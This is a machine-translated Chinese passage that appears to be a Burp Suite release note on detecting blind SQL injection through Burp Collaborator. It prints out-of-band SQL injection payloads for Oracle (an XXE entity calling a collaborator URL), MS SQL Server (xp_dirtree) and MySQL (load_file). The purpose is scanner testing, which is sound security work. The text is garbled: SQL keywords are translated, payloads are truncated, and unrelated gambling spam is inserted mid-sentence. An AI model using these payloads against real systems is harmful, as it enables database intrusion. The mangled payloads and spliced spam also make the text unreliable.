此版本增加了检测的能力完全地盲目注射通过触发与Burp合作者的互动。
之前,bepaly下载 已经使用各种证据来检测SQL注入,包括:
- 错误消息
- 通过注入布尔条件的差异响应
- 时间延迟
这些技术中的每一个都涉及发送有效载荷,旨在触发应用程序的即时响应中的某种差异,无论是在其实际内容还是接收它所花费的时间。在某些情况下,可以存在SQL注入条件,而这种情况无法以这种方式找到,因为没有办法在应用程序的即时响应中造成任何差异。
输入BURP合作者。Burp扫描仪现在发送有效载荷,例如:
'||(选择ExtractValue(xmltype(xmltype)(
'<?xml版本=“ 1.0” encoding =“ utf-8”?> <!doctype root [
<!entity%glrvh系统“ http://fcvlarzebywms16gggoy7tvo.burpcollaborator.net/”>%glrvh;]>'
),'/l')来自dual)||'
'; exec master.dbo.xp_dirtree
'+(选择load_file(
并根据到达BURP合作服务器的任何观察到的交互(DNS或HTTP)报告适当的问题。
上述有效载荷分别在Oracle,Microsoft SQL Server和MySQL上工作(在Windows上运行)。每个有效负载都会突破现有的SQL查询上下文,并使用数据库特定的技术诱导数据库,以通过Web URL或UNC文件路径来执行与Burp Collaborator的某种网络交互。beplay体育能用吗
如今,我们尚未找到与Linux上运行的MySQL相对的类似技术。如果任何人都可以提出一个通用且可行的有效载荷,该有效载荷可以安全地诱导Linux上的MySQL与任意外部域进行交互,而不会损害任何目标系统或数据,那么我们将非常感谢。第一人给我们发电子邮件合格的有效载荷将在Burp Suite赃物中淋浴,包括精心设计的T恤。